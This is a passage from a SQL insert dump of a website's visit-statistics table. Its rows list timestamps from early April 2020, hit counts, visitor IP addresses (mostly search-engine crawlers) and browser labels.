,'178.154.171.127','other'),(494089,1585819528,1,1,0,0,'3.134.116.97','chrome'),(494090,1585819704,1,1,0,0,'157.55.39.22','other'),(494091,1585819735,2,2,0,0,'91.209.11.236','other'),(494092,1585819844,1,1,0,0,'91.196.178.145','firefox'),(494093,1585820208,1,1,0,0,'91.196.178.76','chrome'),(494094,1585821323,2,2,0,0,'91.209.11.236','other'),(494095,1585821429,1,1,0,0,'66.249.64.23','chrome'),(494096,1585821939,1,1,0,0,'94.179.208.80','chrome'),(494097,1585822039,3,3,0,0,'207.46.13.168','other'),(494098,1585822105,1,1,0,0,'46.175.16.72','chrome'),(494099,1585822799,1,1,0,0,'66.249.64.24','chrome'),(494100,1585822957,2,2,0,0,'91.209.11.236','other'),(494101,1585823664,1,1,0,0,'66.249.64.25','chrome'),(494102,1585823710,1,1,0,0,'207.46.13.79','other'),(494103,1585824073,1,1,0,0,'178.154.200.222','other'),(494104,1585824645,2,2,0,0,'91.209.11.236','other'),(494105,1585824874,1,1,0,0,'46.133.93.153','chrome'),(494106,1585826427,1,1,0,0,'66.249.64.25','chrome'),(494107,1585826468,2,2,0,0,'91.209.11.236','other'),(494108,1585826477,1,1,0,0,'66.249.64.23','chrome'),(494109,1585826720,1,1,0,0,'207.46.13.168','other'),(494110,1585826944,1,1,0,0,'91.196.178.183','chrome'),(494111,1585827003,1,1,0,0,'8.29.198.27','other'),(494112,1585827504,1,1,0,0,'66.249.70.38','chrome'),(494113,1585827681,1,1,0,0,'8.29.198.26','other'),(494114,1585827748,20,20,0,0,'5.62.58.234','other'),(494115,1585827977,1,1,0,0,'109.74.154.72','chrome'),(494116,1585828145,1,1,0,0,'91.209.11.236','other'),(494117,1585828229,1,1,0,0,'207.46.13.79','other'),(494118,1585829281,1,1,0,0,'207.46.13.5','other'),(494119,1585829872,1,1,0,0,'66.249.64.23','chrome'),(494120,1585829874,1,1,0,0,'94.179.208.80','chrome'),(494121,1585830102,2,2,0,0,'91.209.11.236','other'),(494122,1585830302,1,1,0,0,'80.95.45.70','chrome'),(494123,1585830800,2,2,0,0,'207.46.13.79','other'),(494124,1585830835,1,1,0,0,'131.220.6.152','chrome'),(494125,1585831820,1,1,0,0,'91.209.11.236','other'),(494126,1585832743,1,1,0,0,'91.209.11.236','other'),(494127,1585833083,2,1,1,0,'207.46.13.168',''),(494128,1585833439,1,1,0,0,'66.249.64.23','chrome'),(494129,1585833985,1,1,0,0,'207.46.13.168','other'),(494130,1585834169,8,8,0,0,'77.120.98.235','other'),(494131,1585834638,2,2,0,0,'94.130.9.183','other'),(494132,1585834671,2,2,0,0,'95.91.80.72','other'),(494133,1585834830,1,1,0,0,'66.249.70.38','chrome'),(494134,1585834838,1,0,1,0,'66.249.64.25',''),(494135,1585834893,1,1,0,0,'91.209.11.236','other'),(494136,1585834915,1,1,0,0,'207.46.13.5','other'),(494137,1585835511,3,3,0,0,'66.249.64.25','chrome'),(494138,1585835586,1,1,0,0,'176.111.33.18','firefox'),(494139,1585835745,1,0,1,0,'207.46.13.79',''),(494140,1585836740,1,1,0,0,'91.209.11.236','other'),(494141,1585837815,1,1,0,0,'91.209.11.236','other'),(494142,1585837836,1,1,0,0,'8.29.198.27','other'),(494143,1585837941,2,1,1,0,'207.46.13.5',''),(494144,1585838099,1,1,0,0,'66.249.64.25','chrome'),(494145,1585838373,2,2,0,0,'207.46.13.5','other'),(494146,1585838504,1,1,0,0,'8.29.198.26','other'),(494147,1585838848,1,1,0,0,'91.209.11.236','other'),(494148,1585838896,1,1,0,0,'66.249.64.24','chrome'),(494149,1585838965,1,0,1,0,'66.249.64.23',''),(494150,1585839537,1,1,0,0,'66.249.64.25','chrome'),(494151,1585839741,2,2,0,0,'207.46.13.79','other'),(494152,1585839778,1,1,0,0,'66.249.64.23','chrome'),(494153,1585839808,1,1,0,0,'66.249.64.24','chrome'),(494154,1585839972,1,1,0,0,'91.209.11.236','other'),(494155,1585840159,1,1,0,0,'176.103.56.200','chrome'),(494156,1585840703,1,1,0,0,'207.46.13.65','other'),(494157,1585840743,1,0,1,0,'66.249.64.25',''),(494158,1585841051,1,1,0,0,'91.209.11.236','other'),(494159,1585841241,1,1,0,0,'207.46.13.79','other'),(494160,1585841809,1,1,0,0,'66.249.64.24','chrome'),(494161,1585841932,1,1,0,0,'207.46.13.5','other'),(494162,1585841986,1,1,0,0,'188.163.18.238','chrome'),(494163,1585842116,1,1,0,0,'91.209.11.236','other'),(494164,1585842509,1,1,0,0,'91.196.178.162','chrome'),(494165,1585843066,1,1,0,0,'66.249.64.24','chrome'),(494166,1585843229,1,1,0,0,'66.249.64.25','chrome'),(494167,1585843269,1,1,0,0,'91.209.11.236','other'),(494168,1585843911,2,2,0,0,'207.46.13.65','other'),(494169,1585844375,1,1,0,0,'91.209.11.236','other'),(494170,1585844467,1,1,0,0,'173.252.111.11','other'),(494171,1585845067,1,1,0,0,'66.249.64.25','chrome'),(494172,1585845593,1,1,0,0,'207.46.13.65','other'),(494173,1585846634,1,1,0,0,'91.209.11.236','other'),(494174,1585847078,2,2,0,0,'66.249.64.25','chrome'),(494175,1585847214,4,4,0,0,'66.249.64.23','chrome'),(494176,1585847675,1,1,0,0,'91.209.11.236','other'),(494177,1585847734,1,1,0,0,'184.94.240.92','firefox'),(494178,1585848297,2,2,0,0,'130.180.220.170','chrome'),(494179,1585848394,1,1,0,0,'207.46.13.5','other'),(494180,1585848653,1,1,0,0,'91.209.11.236','other'),(494181,1585848664,1,1,0,0,'8.29.198.25','other'),(494182,1585848931,2,2,0,0,'66.249.64.23','chrome'),(494183,1585849016,2,2,0,0,'66.249.64.24','chrome'),(494184,1585849339,1,1,0,0,'8.29.198.27','other'),(494185,1585849372,1,1,0,0,'66.249.64.25','chrome'),(494186,1585849652,1,1,0,0,'91.209.11.236','other'),(494187,1585850652,2,2,0,0,'91.209.11.236','other'),(494188,1585850785,1,1,0,0,'162.242.251.9','other'),(494189,1585851058,1,1,0,0,'207.46.13.79','other'),(494190,1585851663,1,1,0,0,'178.154.200.222','other'),(494191,1585851972,1,1,0,0,'162.242.251.9','other'),(494192,1585852287,1,1,0,0,'66.249.70.38','chrome'),(494193,1585852358,1,1,0,0,'91.209.11.236','other'),(494194,1585852840,2,2,0,0,'66.249.64.31','chrome'),(494195,1585854008,1,1,0,0,'66.249.64.1','chrome'),(494196,1585854042,2,2,0,0,'91.209.11.236','other'),(494197,1585854222,8,8,0,0,'77.120.98.235','other'),(494198,1585854343,1,1,0,0,'207.46.13.5','other'),(494199,1585854700,3,2,1,0,'207.46.13.79',''),(494200,1585855528,2,2,0,0,'91.209.11.236','other'),(494201,1585855595,1,1,0,0,'66.249.70.36','chrome'),(494202,1585855747,1,1,0,0,'66.249.64.1','chrome'),(494203,1585855947,2,2,0,0,'66.249.64.31','chrome'),(494204,1585855968,1,1,0,0,'188.165.223.153','chrome'),(494205,1585856182,3,3,0,0,'207.46.13.79','other'),(494206,1585856185,1,1,0,0,'173.252.111.8','other'),(494207,1585856356,1,1,0,0,'207.46.13.5','other'),(494208,1585856718,1,1,0,0,'178.154.200.222','other'),(494209,1585856792,1,1,0,0,'66.249.64.23','chrome'),(494210,1585857160,2,2,0,0,'91.209.11.236','other'),(494211,1585857435,2,2,0,0,'66.249.64.24','chrome'),(494212,1585857694,1,1,0,0,'66.249.70.38','chrome'),(494213,1585857968,2,2,0,0,'66.249.64.25','chrome'),(494214,1585858759,2,2,0,0,'91.209.11.236','other'),(494215,1585858995,1,0,1,0,'66.249.64.25',''),(494216,1585859494,1,1,0,0,'8.29.198.26','other'),(494217,1585859708,2,2,0,0,'66.249.64.25','chrome'),(494218,1585860171,1,1,0,0,'8.29.198.25','other'),(494219,1585860184,2,2,0,0,'91.209.11.236','other'),(494220,1585860301,1,1,0,0,'91.196.178.34','chrome'),(494221,1585860863,1,1,0,0,'207.46.13.79','other'),(494222,1585861047,1,1,0,0,'46.101.122.215','msie'),(494223,1585861524,1,1,0,0,'178.154.200.222','other'),(494224,1585861560,1,1,0,0,'66.249.64.25','chrome'),(494225,1585861578,1,1,0,0,'66.249.64.24','chrome'),(494226,1585861831,2,2,0,0,'91.209.11.236','other'),(494227,1585861914,1,1,0,0,'207.46.13.5','other'),(494228,1585862421,1,1,0,0,'66.249.70.38','chrome'),(494229,1585862650,1,1,0,0,'66.249.70.33','chrome'),(494230,1585862919,1,1,0,0,'66.249.64.23','chrome'),(494231,1585863248,1,1,0,0,'66.249.64.25','chrome'),(494232,1585864138,1,1,0,0,'66.249.70.33','chrome'),(494233,1585864251,2,2,0,0,'66.249.64.24','chrome'),(494234,1585864305,1,1,0,0,'91.209.11.236','other'),(494235,1585864730,1,1,0,0,'207.46.13.79','other'),(494236,1585865018,2,2,0,0,'66.70.160.89','msie'),(494237,1585865230,2,2,0,0,'91.209.11.236','other'),(494238,1585866126,2,2,0,0,'66.249.64.23','chrome'),(494239,1585866428,1,1,0,0,'66.249.64.25','chrome'),(494240,1585866604,1,1,0,0,'66.249.70.46','chrome'),(494241,1585866645,2,2,0,0,'178.154.200.222','other'),(494242,1585866931,1,1,0,0,'91.209.11.236','other'),(494243,1585867278,1,1,0,0,'207.46.13.5','other'),(494244,1585867816,1,1,0,0,'178.154.200.222','other'),(494245,1585867907,2,2,0,0,'91.209.11.236','other'),(494246,1585868359,5,5,0,0,'66.249.64.24','chrome'),(494247,1585868997,1,1,0,0,'66.249.64.23','chrome'),(494248,1585869198,1,1,0,0,'66.249.64.25','chrome'),(494249,1585869725,1,1,0,0,'91.209.11.236','other'),(494250,1585869994,1,1,0,0,'178.154.200.222','other'),(494251,1585870035,3,3,0,0,'66.249.64.24','chrome'),(494252,1585870294,1,0,1,0,'207.46.13.65',''),(494253,1585870327,2,2,0,0,'8.29.198.25','other'),(494254,1585870332,1,1,0,0,'207.46.13.5','other'),(494255,1585870938,1,1,0,0,'66.249.64.23','chrome'),(494256,1585870998,1,1,0,0,'66.249.64.25','chrome'),(494257,1585871319,1,1,0,0,'207.46.13.5','other'),(494258,1585871340,2,2,0,0,'66.249.64.24','chrome'),(494259,1585871605,1,1,0,0,'91.209.11.236','other'),(494260,1585871705,1,1,0,0,'62.205.134.182','other'),(494261,1585872577,2,2,0,0,'66.249.64.25','chrome'),(494262,1585872727,2,2,0,0,'91.209.11.236','other'),(494263,1585872760,1,1,0,0,'66.249.70.38','chrome'),(494264,1585872857,2,2,0,0,'110.229.220.235','firefox'),(494265,1585872940,8,8,0,0,'77.120.98.235','other'),(494266,1585872969,5,5,0,0,'66.249.64.23','chrome'),(494267,1585872979,4,4,0,0,'66.249.64.24','chrome'),(494268,1585873740,1,1,0,0,'207.46.13.65','other'),(494269,1585874025,1,1,0,0,'66.249.64.25','chrome'),(494270,1585874036,2,2,0,0,'66.249.64.23','chrome'),(494271,1585874045,1,1,0,0,'66.249.64.24','chrome'),(494272,1585874438,1,1,0,0,'207.46.13.79','other'),(494273,1585874536,1,1,0,0,'91.209.11.236','other'),(494274,1585874542,1,1,0,0,'209.17.96.74','other'),(494275,1585875101,2,2,0,0,'207.46.13.65','other'),(494276,1585875526,1,1,0,0,'91.209.11.236','other'),(494277,1585875644,4,4,0,0,'66.249.64.23','chrome'),(494278,1585875947,1,1,0,0,'66.249.70.36','chrome'),(494279,1585876448,1,1,0,0,'91.209.11.236','other'),(494280,1585876553,2,2,0,0,'207.46.13.79','other'),(494281,1585876822,1,1,0,0,'66.249.64.23','chrome'),(494282,1585877046,1,1,0,0,'178.154.200.222','other'),(494283,1585877196,1,1,0,0,'66.249.64.25','chrome'),(494284,1585877959,2,2,0,0,'66.249.64.24','chrome'),(494285,1585878300,1,1,0,0,'66.249.70.38','chrome'),(494286,1585878543,1,1,0,0,'213.180.203.101','other'),(494287,1585878808,1,1,0,0,'207.46.13.5','other'),(494288,1585878979,1,1,0,0,'178.154.200.220','other'),(494289,1585881161,1,1,0,0,'8.29.198.27','other'),(494290,1585881830,1,1,0,0,'8.29.198.26','other'),(494291,1585882517,1,1,0,0,'207.46.13.79','other'),(494292,1585883265,1,1,0,0,'66.249.64.24','chrome'),(494293,1585883348,1,1,0,0,'178.154.200.222','other'),(494294,1585883387,2,2,0,0,'207.46.13.5','other'),(494295,1585884210,6,6,0,0,'3.233.239.102','other'),(494296,1585885138,6,6,0,0,'3.233.239.102','other'),(494297,1585886038,1,1,0,0,'66.249.70.38','chrome'),(494298,1585886042,1,1,0,0,'66.249.64.24','chrome'),(494299,1585886132,6,6,0,0,'3.233.239.102','other'),(494300,1585887020,1,1,0,0,'66.249.70.38','chrome'),(494301,1585887133,4,4,0,0,'3.233.239.102','other'),(494302,1585887493,1,1,0,0,'207.46.13.79','other'),(494303,1585887501,1,1,0,0,'94.180.130.27','chrome'),(494304,1585887918,1,1,0,0,'91.209.11.236','other'),(494305,1585888135,5,5,0,0,'3.233.239.102','other'),(494306,1585888575,1,1,0,0,'66.249.64.23','chrome'),(494307,1585888650,1,1,0,0,'66.249.64.25','chrome'),(494308,1585888852,1,1,0,0,'62.205.134.182','other'),(494309,1585888879,2,2,0,0,'91.209.11.236','other'),(494310,1585889075,6,6,0,0,'3.233.239.102','other'),(494311,1585889461,1,1,0,0,'207.46.13.4','other'),(494312,1585890010,6,6,0,0,'3.233.239.102','other'),(494313,1585890302,2,2,0,0,'91.209.11.236','other'),(494314,1585890858,1,1,0,0,'66.249.64.25','chrome'),(494315,1585890882,1,1,0,0,'66.249.64.23','chrome'),(494316,1585890915,5,5,0,0,'3.233.239.102','other'),(494317,1585890988,1,1,0,0,'66.249.70.38','chrome'),(494318,1585891453,1,1,0,0,'207.46.13.152','other'),(494319,1585891532,1,1,0,0,'18.191.207.220','chrome'),(494320,1585891554,1,1,0,0,'66.249.64.24','chrome'),(494321,1585891592,1,1,0,0,'91.196.178.68','chrome'),(494322,1585891807,8,8,0,0,'77.120.98.235','other'),(494323,1585891995,6,6,0,0,'3.233.239.102','other'),(494324,1585891999,1,1,0,0,'8.29.198.27','other'),(494325,1585892381,1,1,0,0,'178.154.200.222','other'),(494326,1585892577,2,2,0,0,'91.209.11.236','other'),(494327,1585892610,1,1,0,0,'213.180.203.16','other'),(494328,1585892652,1,1,0,0,'8.29.198.25','other'),(494329,1585892750,1,1,0,0,'207.46.13.79','other'),(494330,1585893506,2,2,0,0,'66.249.64.24','chrome'),(494331,1585893999,1,1,0,0,'66.249.69.46','chrome'),(494332,1585894065,2,2,0,0,'91.209.11.236','other'),(494333,1585895596,1,1,0,0,'207.46.13.79','other'),(494334,1585895737,2,2,0,0,'91.209.11.236','other'),(494335,1585895849,2,2,0,0,'207.46.13.5','other'),(494336,1585895965,1,1,0,0,'66.249.64.23','chrome'),(494337,1585896097,1,0,1,0,'66.249.64.24',''),(494338,1585896184,1,1,0,0,'207.46.13.4','other'),(494339,1585896802,1,1,0,0,'178.154.200.222','other'),(494340,1585896883,1,1,0,0,'91.196.177.46','chrome'),(494341,1585897000,2,1,1,0,'207.46.13.79',''),(494342,1585897076,1,1,0,0,'66.249.64.24','chrome'),(494343,1585897197,2,2,0,0,'66.249.64.25','chrome'),(494344,1585897280,1,1,0,0,'91.209.11.236','other'),(494345,1585897287,3,3,0,0,'66.249.64.23','chrome'),(494346,1585897311,1,1,0,0,'91.196.177.207','chrome'),(494347,1585898165,2,2,0,0,'207.46.13.152','other'),(494348,1585898207,2,2,0,0,'91.209.11.236','other'),(494349,1585898301,2,2,0,0,'207.46.13.5','other'),(494350,1585898329,1,1,0,0,'91.196.178.68','chrome'),(494351,1585898627,1,0,1,0,'66.249.64.25',''),(494352,1585898629,1,0,1,0,'66.249.64.24',''),(494353,1585898631,2,2,0,0,'66.249.64.24','chrome'),(494354,1585898842,1,1,0,0,'207.46.13.4','other'),(494355,1585898971,1,1,0,0,'66.249.70.38','chrome'),(494356,1585899009,1,1,0,0,'66.249.70.36','chrome'),(494357,1585899180,1,1,0,0,'66.249.64.23','chrome'),(494358,1585899842,1,1,0,0,'91.209.11.236','other'),(494359,1585900092,2,2,0,0,'207.46.13.79','other'),(494360,1585900762,2,2,0,0,'91.209.11.236','other'),(494361,1585900849,1,1,0,0,'207.46.13.152','other'),(494362,1585901596,1,1,0,0,'91.196.178.68','chrome'),(494363,1585901645,1,1,0,0,'66.249.64.25','chrome'),(494364,1585901749,1,1,0,0,'213.180.203.16','other'),(494365,1585901914,1,1,0,0,'91.196.178.93','chrome'),(494366,1585902575,1,1,0,0,'207.46.13.79','other'),(494367,1585902583,2,2,0,0,'91.209.11.236','other'),(494368,1585902833,1,1,0,0,'8.29.198.27','other'),(494369,1585903033,1,1,0,0,'66.249.64.24','chrome'),(494370,1585903037,1,1,0,0,'207.46.13.4','other'),(494371,1585903122,1,0,1,0,'66.249.64.25',''),(494372,1585903480,1,1,0,0,'8.29.198.25','other'),(494373,1585903515,1,1,0,0,'91.209.11.236','other'),(494374,1585904559,3,3,0,0,'195.12.59.250','chrome'),(494375,1585905202,1,1,0,0,'213.180.203.16','other'),(494376,1585906067,1,1,0,0,'91.209.11.236','other'),(494377,1585906487,1,1,0,0,'207.46.13.4','other'),(494378,1585907138,1,1,0,0,'13.58.103.63','chrome'),(494379,1585907172,2,2,0,0,'91.209.11.236','other'),(494380,1585907608,1,1,0,0,'178.154.200.196','chrome'),(494381,1585907614,1,1,0,0,'91.196.178.93','firefox'),(494382,1585907785,1,1,0,0,'207.46.13.4','other'),(494383,1585907791,1,1,0,0,'207.46.13.152','other'),(494384,1585907840,1,1,0,0,'91.196.178.183','chrome'),(494385,1585907863,2,2,0,0,'207.46.13.79','other'),(494386,1585908905,1,1,0,0,'178.154.200.222','other'),(494387,1585909077,1,1,0,0,'91.209.11.236','other'),(494388,1585909720,1,1,0,0,'207.46.13.5','other'),(494389,1585909864,1,1,0,0,'91.196.178.183','chrome'),(494390,1585910007,1,1,0,0,'91.209.11.236','other'),(494391,1585910212,1,1,0,0,'207.46.13.79','other'),(494392,1585911042,1,1,0,0,'91.209.11.236','other'),(494393,1585911402,1,1,0,0,'207.46.13.152','other'),(494394,1585911520,8,8,0,0,'77.120.98.235','other'),(494395,1585911806,1,0,1,0,'207.46.13.5',''),(494396,1585912064,1,1,0,0,'91.209.11.236','other'),(494397,1585912435,2,2,0,0,'207.46.13.5','other'),(494398,1585912622,1,1,0,0,'207.46.13.152','other'),(494399,1585912897,1,1,0,0,'91.196.178.183','chrome'),(494400,1585913105,1,1,0,0,'66.249.70.36','chrome'),(494401,1585913163,1,1,0,0,'91.209.11.236','other'),(494402,1585913622,1,1,0,0,'66.249.64.24','chrome'),(494403,1585913667,1,1,0,0,'8.29.198.25','other'),(494404,1585913805,1,1,0,0,'207.46.13.4','other'),(494405,1585914236,1,1,0,0,'91.209.11.236','other'),(494406,1585914307,1,1,0,0,'8.29.198.26','other'),(494407,1585914529,1,1,0,0,'37.52.17.111','chrome'),(494408,1585915078,1,1,0,0,'109.74.154.72','chrome'),(494409,1585915147,1,1,0,0,'54.208.102.37','other'),(494410,1585915149,1,1,0,0,'107.21.1.8','other'),(494411,1585915286,1,1,0,0,'91.209.11.236','other'),(494412,1585915347,1,1,0,0,'207.46.13.79','other'),(494413,1585915373,1,1,0,0,'66.249.64.25','chrome'),(494414,1585915375,1,1,0,0,'66.249.64.23','chrome'),(494415,1585915377,2,2,0,0,'66.249.64.24','chrome'),(494416,1585916363,2,2,0,0,'66.249.64.24','chrome'),(494417,1585916529,2,2,0,0,'91.209.11.236','other'),(494418,1585916591,2,2,0,0,'207.46.13.79','other'),(494419,1585917028,1,1,0,0,'131.220.6.152','chrome'),(494420,1585917073,1,1,0,0,'91.196.178.93','firefox'),(494421,1585917151,3,3,0,0,'66.249.64.23','chrome'),(494422,1585917193,1,1,0,0,'207.46.13.152','other'),(494423,1585917209,1,1,0,0,'207.46.13.4','other'),(494424,1585917215,1,1,0,0,'207.46.13.5','other'),(494425,1585917298,2,2,0,0,'66.249.64.24','chrome'),(494426,1585917602,1,1,0,0,'91.209.11.236','other'),(494427,1585918724,1,1,0,0,'91.209.11.236','other'),(494428,1585918966,1,1,0,0,'66.249.64.23','chrome'),(494429,1585919138,3,3,0,0,'66.249.64.24','chrome'),(494430,1585919144,1,1,0,0,'66.249.70.36','chrome'),(494431,1585919358,1,1,0,0,'66.249.64.25','chrome'),(494432,1585919850,1,1,0,0,'107.178.194.237','chrome'),(494433,1585919884,1,1,0,0,'178.154.200.222','other'),(494434,1585919899,1,1,0,0,'207.46.13.5','other'),(494435,1585919904,1,1,0,0,'91.196.178.183','chrome'),(494436,1585919923,1,1,0,0,'91.209.11.236','other'),(494437,1585920600,1,1,0,0,'207.46.13.152','other'),(494438,1585921088,6,6,0,0,'94.130.9.183','other'),(494439,1585921159,2,2,0,0,'5.19.168.169','other'),(494440,1585921332,1,1,0,0,'91.209.11.236','other'),(494441,1585921548,1,0,1,0,'66.249.64.24',''),(494442,1585922068,1,1,0,0,'207.46.13.5','other'),(494443,1585922275,1,1,0,0,'91.209.11.236','other'),(494444,1585922546,1,1,0,0,'66.249.64.23','chrome'),(494445,1585922888,2,2,0,0,'66.249.64.25','chrome'),(494446,1585922944,1,1,0,0,'178.92.250.105','chrome'),(494447,1585923001,2,1,1,0,'207.46.13.5',''),(494448,1585923568,1,1,0,0,'207.46.13.4','other'),(494449,1585923598,1,1,0,0,'91.209.11.236','other'),(494450,1585924165,1,1,0,0,'66.249.64.23','chrome'),(494451,1585924205,1,1,0,0,'66.249.64.24','chrome'),(494452,1585924497,1,1,0,0,'8.29.198.26','other'),(494453,1585924757,2,2,0,0,'207.46.13.152','other'),(494454,1585924793,1,1,0,0,'91.209.11.236','other'),(494455,1585925135,1,1,0,0,'8.29.198.25','other'),(494456,1585925543,3,3,0,0,'66.249.64.24','chrome'),(494457,1585925623,3,3,0,0,'66.249.64.23','chrome'),(494458,1585925644,3,3,0,0,'66.249.64.25','chrome'),(494459,1585925768,1,1,0,0,'207.46.13.5','other'),(494460,1585926071,1,1,0,0,'91.209.11.236','other'),(494461,1585926620,2,2,0,0,'207.46.13.4','other'),(494462,1585926699,2,2,0,0,'66.249.64.23','chrome'),(494463,1585926757,1,1,0,0,'207.46.13.5','other'),(494464,1585927354,1,1,0,0,'91.209.11.236','other'),(494465,1585927530,1,1,0,0,'207.46.13.152','other'),(494466,1585927745,2,2,0,0,'66.249.64.23','chrome'),(494467,1585928436,1,1,0,0,'207.46.13.152','other'),(494468,1585928530,1,1,0,0,'51.68.152.26','chrome'),(494469,1585928548,1,1,0,0,'207.46.13.79','other'),(494470,1585928624,1,1,0,0,'91.209.11.236','other'),(494471,1585929105,1,1,0,0,'207.46.13.5','other'),(494472,1585929189,2,2,0,0,'66.249.64.24','chrome'),(494473,1585929253,1,1,0,0,'91.196.178.27','chrome'),(494474,1585929283,1,1,0,0,'66.249.64.25','chrome'),(494475,1585929929,1,1,0,0,'91.209.11.236','other'),(494476,1585929978,1,1,0,0,'207.46.13.152','other'),(494477,1585930776,1,1,0,0,'194.44.228.210','firefox'),(494478,1585931023,1,1,0,0,'66.249.64.23','chrome'),(494479,1585932039,1,1,0,0,'207.46.13.79','other'),(494480,1585932288,1,1,0,0,'77.123.146.23','msie'),(494481,1585932418,1,1,0,0,'91.209.11.236','other'),(494482,1585932596,1,1,0,0,'78.154.177.247','chrome'),(494483,1585933401,1,1,0,0,'207.46.13.5','other'),(494484,1585933478,2,2,0,0,'91.209.11.236','other'),(494485,1585934683,1,1,0,0,'91.209.11.236','other'),(494486,1585934797,2,2,0,0,'207.46.13.152','other'),(494487,1585935331,1,1,0,0,'8.29.198.27','other'),(494488,1585935690,1,1,0,0,'91.209.11.236','other'),(494489,1585935963,1,1,0,0,'8.29.198.26','other'),(494490,1585937044,2,2,0,0,'91.209.11.236','other'),(494491,1585937129,1,1,0,0,'173.252.111.9','other'),(494492,1585937132,2,2,0,0,'173.252.111.23','other'),(494493,1585937135,1,1,0,0,'173.252.111.11','other'),(494494,1585937136,1,1,0,0,'173.252.111.5','other'),(494495,1585937160,1,1,0,0,'66.249.64.24','chrome'),(494496,1585937654,1,1,0,0,'207.46.13.5','other'),(494497,1585937853,1,1,0,0,'66.249.70.33','chrome'),(494498,1585937939,1,1,0,0,'207.46.13.152','other'),(494499,1585938055,2,2,0,0,'66.249.64.23','chrome'),(494500,1585938485,1,1,0,0,'91.209.11.236','other'),(494501,1585938968,1,1,0,0,'31.13.103.12','other'),(494502,1585938969,1,1,0,0,'31.13.103.6','other'),(494505,1585939020,1,1,0,0,'31.13.103.14','other'),(494506,1585939021,1,1,0,0,'31.13.103.26','other'),(494508,1585939510,1,1,0,0,'91.196.178.162','chrome'),(494509,1585939608,3,3,0,0,'207.46.13.5','other'),(494510,1585939895,1,1,0,0,'66.249.64.23','chrome'),(494511,1585940229,2,2,0,0,'91.209.11.236','other'),(494512,1585940327,2,2,0,0,'66.249.64.25','chrome'),(494513,1585940543,2,2,0,0,'207.46.13.152','other'),(494514,1585941111,1,1,0,0,'66.249.64.24','chrome'),(494515,1585941122,2,2,0,0,'66.249.64.23','chrome'),(494516,1585941836,2,2,0,0,'91.209.11.236','other'),(494517,1585942473,2,2,0,0,'207.46.13.5','other'),(494518,1585943466,1,1,0,0,'91.209.11.236','other'),(494519,1585943592,2,2,0,0,'66.249.70.36','chrome'),(494520,1585943596,1,1,0,0,'207.46.13.152','other'),(494521,1585943597,1,1,0,0,'66.249.70.33','chrome'),(494522,1585944263,1,1,0,0,'207.46.13.5','other'),(494523,1585944380,1,1,0,0,'66.249.64.23','chrome'),(494524,1585944394,2,2,0,0,'91.209.11.236','other'),(494525,1585944642,1,1,0,0,'66.249.70.38','chrome'),(494526,1585945230,2,2,0,0,'207.46.13.152','other'),(494527,1585945889,2,2,0,0,'91.209.11.236','other'),(494528,1585946009,3,3,0,0,'66.249.64.23','chrome'),(494529,1585946169,1,1,0,0,'8.29.198.26','other'),(494530,1585946527,1,1,0,0,'207.46.13.152','other'),(494531,1585946793,1,1,0,0,'8.29.198.25','other'),(494532,1585946914,1,1,0,0,'207.46.13.5','other'),(494533,1585947718,2,2,0,0,'66.249.64.23','chrome'),(494534,1585948479,2,2,0,0,'91.209.11.236','other'),(494535,1585948814,2,2,0,0,'66.249.64.23','chrome'),(494536,1585948871,8,8,0,0,'77.120.98.235','other'),(494537,1585949603,1,1,0,0,'188.19.50.247','chrome'),(494538,1585949673,1,0,1,0,'207.46.13.5',''),(494539,1585950124,1,1,0,0,'207.46.13.5','other'),(494540,1585950147,1,1,0,0,'91.209.11.236','other'),(494541,1585950230,1,0,1,0,'66.249.64.24',''),(494542,1585950582,1,1,0,0,'66.249.64.24','chrome'),(494543,1585950975,1,1,0,0,'66.249.64.23','chrome'),(494544,1585951097,1,1,0,0,'91.209.11.236','other'),(494545,1585951519,2,2,0,0,'66.249.64.24','chrome'),(494546,1585952011,2,2,0,0,'91.209.11.236','other'),(494547,1585952399,1,1,0,0,'207.46.13.152','other'),(494548,1585952644,2,2,0,0,'66.249.64.25','chrome'),(494549,1585952857,2,2,0,0,'66.249.64.24','chrome'),(494550,1585953921,2,2,0,0,'207.46.13.5','other'),(494551,1585954060,1,1,0,0,'207.46.13.152','other'),(494552,1585954843,1,1,0,0,'91.209.11.236','other'),(494553,1585955763,2,2,0,0,'66.249.64.25','chrome'),(494554,1585955808,1,1,0,0,'91.209.11.236','other'),(494555,1585956607,1,1,0,0,'62.109.22.217','chrome'),(494556,1585956749,1,1,0,0,'91.209.11.236','other'),(494557,1585956752,2,2,0,0,'207.46.13.5','other'),(494558,1585957004,2,2,0,0,'8.29.198.26','other'),(494559,1585957716,1,1,0,0,'91.209.11.236','other'),(494560,1585957829,1,1,0,0,'66.249.70.48','chrome'),(494561,1585957942,1,1,0,0,'66.249.70.38','chrome'),(494562,1585958105,1,1,0,0,'62.205.134.182','other'),(494563,1585958136,1,1,0,0,'66.249.70.33','chrome'),(494564,1585958740,1,1,0,0,'91.209.11.236','other'),(494565,1585959710,1,1,0,0,'91.209.11.236','other'),(494566,1585959765,1,1,0,0,'66.249.64.23','chrome'),(494567,1585960067,1,1,0,0,'66.249.64.24','chrome'),(494568,1585960221,1,1,0,0,'207.46.13.152','other'),(494569,1585960678,1,1,0,0,'91.209.11.236','other'),(494570,1585961235,1,1,0,0,'66.249.64.24','chrome'),(494571,1585961762,1,1,0,0,'91.209.11.236','other'),(494572,1585962762,1,1,0,0,'91.209.11.236','other'),(494573,1585962933,1,1,0,0,'66.249.64.25','chrome'),(494574,1585963384,1,1,0,0,'66.249.70.36','chrome'),(494575,1585963797,1,1,0,0,'91.209.11.236','other'),(494576,1585963868,1,1,0,0,'66.249.70.33','chrome'),(494577,1585964157,1,1,0,0,'207.46.13.5','other'),(494578,1585964282,1,1,0,0,'178.154.200.222','other'),(494579,1585964643,1,0,1,0,'66.249.64.23',''),(494580,1585964921,8,8,0,0,'77.120.98.235','other'),(494581,1585964960,1,1,0,0,'91.209.11.236','other'),(494582,1585965069,2,2,0,0,'85.215.88.230','other'),(494583,1585965877,2,2,0,0,'66.249.64.23','chrome'),(494584,1585966061,1,1,0,0,'91.209.11.236','other'),(494585,1585966308,1,1,0,0,'66.249.70.38','chrome'),(494586,1585966828,1,1,0,0,'66.249.64.23','chrome'),(494587,1585967118,1,1,0,0,'91.209.11.236','other'),(494588,1585967540,1,1,0,0,'66.249.70.33','chrome'),(494589,1585967830,2,2,0,0,'8.29.198.26','other'),(494590,1585968291,1,1,0,0,'91.209.11.236','other'),(494591,1585968353,2,2,0,0,'66.249.64.23','chrome'),(494592,1585968598,1,1,0,0,'66.249.70.36','chrome'),(494593,1585968816,1,1,0,0,'178.154.200.222','other'),(494594,1585969419,1,1,0,0,'91.209.11.236','other'),(494595,1585969932,2,2,0,0,'66.249.64.2